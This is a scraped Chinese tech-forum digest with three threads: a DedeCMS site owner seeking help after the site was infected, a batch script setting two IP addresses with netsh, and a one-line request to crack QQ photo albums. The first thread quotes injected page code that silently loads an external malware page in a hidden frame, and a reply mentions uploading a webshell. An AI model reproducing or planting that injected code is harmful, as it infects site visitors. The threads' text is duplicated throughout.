当前位置: 操作系统/服务器>windows
本页文章导读:
▪网站被挂马,网页正常显示,但是源文件中有错误 网站被挂马,网页正常显示,但是源文件中有异常请高手帮忙,十万火急啊。我的网站http://www.5i5qq.com/被挂马了,用360检测后查出相应的页面后,页面内容显示正常,但是看源码后却显示的.........
▪ 如何用代码修改IP地址,并且要同时修改两个IP,小弟我只知道如何修改一个IP 怎么用代码修改IP地址,并且要同时修改两个IP,我只知道怎么修改一个IP修改一个IP的代码如下,现求同时修改两个的! @echo off rem eth //eth 为网卡名称,可在网络连接中查询,如 "本.........
▪ 如何破解一下QQ相册 怎么破解一下QQ相册谁会破解QQ相册,会的交流一下,只是兴趣爱好,没有别的企图。
万能解码器 ......
[1]网站被挂马,网页正常显示,但是源文件中有错误
来源: 互联网 发布时间: 2014-02-18
网站被挂马,网页正常显示,但是源文件中有异常
请高手帮忙,十万火急啊。我的网站http://www.5i5qq.com/被挂马了,用360检测后查出相应的页面后,页面内容显示正常,但是看源码后却显示的是:
<html>
<head>
</head>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf("CK");
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie="CK=test;expires="+EP.toGMTString();
self.hi.location="http://i876r.3322.org:54321/w/m.htm";}
}
</script>
<frameset rows="100%,*" onLoad="showme()">
<frame name="hello" src="/qqtouxiangdaquan/670/UpdatedPage/aGlqYWNr.html">
<frame name="hi" src="">
</frameset>
</html>
这样的页面源码文件,请问这问题怎么解决,我用的是dede5.5的程序 。跪求高手。
把360卸载了吧!找个专业查杀网页木马的工具,彻底的杀一次。你没有备份么的页面文件么?把被改了的页面覆盖了。看下网站程序有没有更新,更改管理员密码。
我管的网站也是老被人挂马,改主页。我把网站所有可以编辑文字的地方都关了,网站也没什么漏洞。密码全删除重设,还是被改,后来,发现是服务器的问题。服务器上还有其他网站,而且服务器本身设置的很垃圾,我随便的找个WEBSHELL上传到FTP空间上,可以浏览所有目录,而且可以下载,可以写除C盘得目录。
楼主网站用的是独立服务器还是虚拟服务器呢?
局域网ARP, 在所有访问的网页中插入指定代码
请高手帮忙,十万火急啊。我的网站http://www.5i5qq.com/被挂马了,用360检测后查出相应的页面后,页面内容显示正常,但是看源码后却显示的是:
<html>
<head>
</head>
<script>
function showme()
{
var CK=document.cookie;
var sa=CK.indexOf("CK");
if(sa!=-1){}else{var EP=new Date();
EP.setTime(EP.getTime()+24*60*60*1000);
document.cookie="CK=test;expires="+EP.toGMTString();
self.hi.location="http://i876r.3322.org:54321/w/m.htm";}
}
</script>
<frameset rows="100%,*" onLoad="showme()">
<frame name="hello" src="/qqtouxiangdaquan/670/UpdatedPage/aGlqYWNr.html">
<frame name="hi" src="">
</frameset>
</html>
这样的页面源码文件,请问这问题怎么解决,我用的是dede5.5的程序 。跪求高手。
把360卸载了吧!找个专业查杀网页木马的工具,彻底的杀一次。你没有备份么的页面文件么?把被改了的页面覆盖了。看下网站程序有没有更新,更改管理员密码。
我管的网站也是老被人挂马,改主页。我把网站所有可以编辑文字的地方都关了,网站也没什么漏洞。密码全删除重设,还是被改,后来,发现是服务器的问题。服务器上还有其他网站,而且服务器本身设置的很垃圾,我随便的找个WEBSHELL上传到FTP空间上,可以浏览所有目录,而且可以下载,可以写除C盘得目录。
楼主网站用的是独立服务器还是虚拟服务器呢?
局域网ARP, 在所有访问的网页中插入指定代码
[2] 如何用代码修改IP地址,并且要同时修改两个IP,小弟我只知道如何修改一个IP
来源: 互联网 发布时间: 2014-02-18
怎么用代码修改IP地址,并且要同时修改两个IP,我只知道怎么修改一个IP
修改一个IP的代码如下,现求同时修改两个的!
@echo off
rem eth //eth 为网卡名称,可在网络连接中查询,如 "本地链接 "
set eth= "本地连接"
rem ip //ip 为你想更改的IP
set ip=192.168.10.242
rem ip2
set ip2=192.168.10.10
rem gateway //gateway 为网关地址
set gateway=192.168.10.250
rem netmasks //netmasks 为子网掩码
set netmasks=255.255.255.0
rem dns //dns 为首选DNS
set dns=202.96.134.133
rem dns2 //dns2 为备用DNS
set dns2=202.96.128.68
echo 正在将本机IP更改到: %ip% 请等候...
rem
if %gateway%==none netsh interface ip set address %eth% static %ip% %netmasks% %gateway% > nul
if not %gateway%==none netsh interface ip set address %eth% static %ip% %netmasks% %gateway% 1 > nul
if %dns%==none netsh interface ip set dns %eth% static %dns%> nul
if not %dns%==none netsh interface ip set dns %eth% static %dns%> nul
if %dns2%==none netsh interface ip add dns %eth% %dns2%> nul
if not %dns2%==none netsh interface ip add dns %eth% %dns2% 2> nul
if %gateway%==none netsh interface ip set address %eth% static %ip2% %netmasks% > nul
if not %gateway%==none netsh interface ip set address %eth% static %ip2% %netmasks% 2 > nul
echo.........................
echo 检查当前本机IP:
ipconfig
echo.........................
echo 成功将本机IP更改为%ip%!
pause
exit
因为一个是内网IP,一个是连接外网的IP,所以我需要能同时修改两个的
给楼主写了个,参考看看
BatchFile code
修改一个IP的代码如下,现求同时修改两个的!
@echo off
rem eth //eth 为网卡名称,可在网络连接中查询,如 "本地链接 "
set eth= "本地连接"
rem ip //ip 为你想更改的IP
set ip=192.168.10.242
rem ip2
set ip2=192.168.10.10
rem gateway //gateway 为网关地址
set gateway=192.168.10.250
rem netmasks //netmasks 为子网掩码
set netmasks=255.255.255.0
rem dns //dns 为首选DNS
set dns=202.96.134.133
rem dns2 //dns2 为备用DNS
set dns2=202.96.128.68
echo 正在将本机IP更改到: %ip% 请等候...
rem
if %gateway%==none netsh interface ip set address %eth% static %ip% %netmasks% %gateway% > nul
if not %gateway%==none netsh interface ip set address %eth% static %ip% %netmasks% %gateway% 1 > nul
if %dns%==none netsh interface ip set dns %eth% static %dns%> nul
if not %dns%==none netsh interface ip set dns %eth% static %dns%> nul
if %dns2%==none netsh interface ip add dns %eth% %dns2%> nul
if not %dns2%==none netsh interface ip add dns %eth% %dns2% 2> nul
if %gateway%==none netsh interface ip set address %eth% static %ip2% %netmasks% > nul
if not %gateway%==none netsh interface ip set address %eth% static %ip2% %netmasks% 2 > nul
echo.........................
echo 检查当前本机IP:
ipconfig
echo.........................
echo 成功将本机IP更改为%ip%!
pause
exit
因为一个是内网IP,一个是连接外网的IP,所以我需要能同时修改两个的
给楼主写了个,参考看看
BatchFile code
@echo off rem eth //eth 为网卡名称,可在网络连接中查询,如 "本地链接 " set eth= "本地连接" rem ip //ip 为你想更改的IP set ip=192.168.10.242 rem ip2 set ip2=192.168.10.10 rem gateway //gateway 为网关地址 set gateway=192.168.10.250 rem netmasks //netmasks 为子网掩码 set netmasks=255.255.255.0 rem dns //dns 为首选DNS set dns=202.96.134.133 rem dns2 //dns2 为备用DNS set dns2=202.96.128.68 echo 正在将本机IP更改到: %ip% 请等候... netsh inte ip set addr %eth% stat %ip% %netmasks% %gateway% none echo 正在添加 %ip2% 到本机IP列表,请等候... netsh inte ip add addr %eth% %ip2% %netmasks% echo 正在设置首选DNS服务器IP地址为: %dns% 请稍后... netsh inte ip set dns %eth% stat %dns% register=primary echo 正在设置备用DNS服务器IP地址为: %dns2% 请稍后... netsh inte ip add dns %eth% %dns2% index=2 echo......................... echo 检查当前本机IP: ipconfig echo......................... echo 成功将本机IP更改为%ip%! pause
[3] 如何破解一下QQ相册
来源: 互联网 发布时间: 2014-02-18
怎么破解一下QQ相册
谁会破解QQ相册,会的交流一下,只是兴趣爱好,没有别的企图。
万能解码器
谁会破解QQ相册,会的交流一下,只是兴趣爱好,没有别的企图。
万能解码器
最新技术文章: